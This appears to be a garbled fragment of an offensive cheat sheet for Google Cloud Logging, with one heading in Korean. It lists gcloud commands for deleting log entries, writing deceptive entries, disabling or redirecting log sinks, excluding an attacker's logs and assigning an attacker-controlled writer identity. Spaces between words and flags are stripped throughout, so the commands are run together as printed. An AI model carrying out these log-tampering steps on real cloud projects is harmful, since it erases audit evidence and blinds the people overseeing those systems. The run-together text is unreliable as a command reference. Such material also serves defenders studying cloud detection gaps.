# Read logsgcloudloggingread"logName=projects/your-project-id/logs/log-id"--limit=10--format=json# Everything from a timestampgcloudloggingread"timestamp >= \"2023-01-01T00:00:00Z\""--limit=10--format=json# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
logging.logs.delete
# Delete all entries from a log in the _Default log bucket - logging.logs.deletegcloudlogginglogsdelete<log-name>
로그 작성 - logging.logEntries.create
# Write a log entry to try to disrupt some systemgcloudloggingwriteLOG_NAME"A deceptive log entry"--severity=ERROR
# Disable sink - logging.sinks.updategcloudloggingsinksupdate<sink-name>--disabled# Createa filter to exclude attackers logs - logging.sinks.updategcloudloggingsinksupdateSINK_NAME--add-exclusion="name=exclude-info-logs,filter=severity<INFO"# Change where the sink is storing the data - logging.sinks.updategcloudloggingsinksupdate<sink-name>new-destination# Change the service account to one withuot permissions to write in the destination - logging.sinks.updategcloudloggingsinksupdateSINK_NAME--custom-writer-identity=attacker-service-account-email--project=PROJECT_ID# Remove explusions to try to overload with logs - logging.sinks.updategcloudloggingsinksupdateSINK_NAME--clear-exclusions# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloudloggingsinksupdateSINK_NAME--use-partitioned-tablesgcloudloggingsinksupdateSINK_NAME--no-use-partitioned-tables